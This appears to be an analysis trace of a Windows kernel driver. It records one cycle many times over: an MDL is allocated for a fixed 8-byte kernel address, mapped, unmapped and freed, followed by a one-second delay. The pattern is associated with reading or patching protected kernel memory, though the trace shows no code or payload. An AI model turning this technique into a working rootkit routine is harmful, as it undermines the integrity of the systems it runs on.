| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c270490 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c270490, MemoryDescriptorList_unk_out = 0xffffe0003c270490 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c270490, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002ba3da40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ba3da40, MemoryDescriptorList_unk = 0xffffe0003c270490 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c270490 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b494460 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b494460, MemoryDescriptorList_unk_out = 0xffffe0003b494460 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b494460, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002bc3ba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bc3ba40, MemoryDescriptorList_unk = 0xffffe0003b494460 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b494460 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0004aff7370 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0004aff7370, MemoryDescriptorList_unk_out = 0xffffe0004aff7370 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0004aff7370, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002bc50a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bc50a40, MemoryDescriptorList_unk = 0xffffe0004aff7370 |
| IoFreeMdl | Mdl_unk = 0xffffe0004aff7370 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c251f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c251f40, MemoryDescriptorList_unk_out = 0xffffe0003c251f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c251f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002be97a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002be97a40, MemoryDescriptorList_unk = 0xffffe0003c251f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c251f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003f9b4870 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003f9b4870, MemoryDescriptorList_unk_out = 0xffffe0003f9b4870 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003f9b4870, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002be99a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002be99a40, MemoryDescriptorList_unk = 0xffffe0003f9b4870 |
| IoFreeMdl | Mdl_unk = 0xffffe0003f9b4870 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002bfb4a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bfb4a40, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002bfb6a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bfb6a40, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002bfc1a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bfc1a40, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c01ba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c01ba40, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f8680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f8680, MemoryDescriptorList_unk_out = 0xffffe0003c1f8680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1f8680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c2a4a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c2a4a40, MemoryDescriptorList_unk = 0xffffe0003c1f8680 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f8680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003ae54160 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003ae54160, MemoryDescriptorList_unk_out = 0xffffe0003ae54160 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003ae54160, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c2b1a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c2b1a40, MemoryDescriptorList_unk = 0xffffe0003ae54160 |
| IoFreeMdl | Mdl_unk = 0xffffe0003ae54160 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461f8890 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461f8890, MemoryDescriptorList_unk_out = 0xffffe000461f8890 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000461f8890, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c2b3a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c2b3a40, MemoryDescriptorList_unk = 0xffffe000461f8890 |
| IoFreeMdl | Mdl_unk = 0xffffe000461f8890 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c2caa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c2caa40, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c328a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c328a40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c376a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c376a40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c590a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c590a40, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c58d010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c58d010, MemoryDescriptorList_unk_out = 0xffffe0003c58d010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c58d010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c5a2a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c5a2a40, MemoryDescriptorList_unk = 0xffffe0003c58d010 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c58d010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c6b1a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c6b1a40, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c86fa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c86fa40, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c872a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c872a40, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002d03fa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d03fa40, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002d040a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d040a40, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002d1b1a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d1b1a40, MemoryDescriptorList_unk = 0xffffe00044551330 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473be010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473be010, MemoryDescriptorList_unk_out = 0xffffe000473be010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002d1e0a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d1e0a40, MemoryDescriptorList_unk = 0xffffe000473be010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473be010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473be010, MemoryDescriptorList_unk_out = 0xffffe000473be010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002d659a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d659a40, MemoryDescriptorList_unk = 0xffffe000473be010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002e428a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e428a40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473be010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473be010, MemoryDescriptorList_unk_out = 0xffffe000473be010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002e481a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e481a40, MemoryDescriptorList_unk = 0xffffe000473be010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473be010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473be010, MemoryDescriptorList_unk_out = 0xffffe000473be010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473be010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002e512a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e512a40, MemoryDescriptorList_unk = 0xffffe000473be010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473be010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b724260 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b724260, MemoryDescriptorList_unk_out = 0xffffe0003b724260 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b724260, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002e893a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e893a40, MemoryDescriptorList_unk = 0xffffe0003b724260 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b724260 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
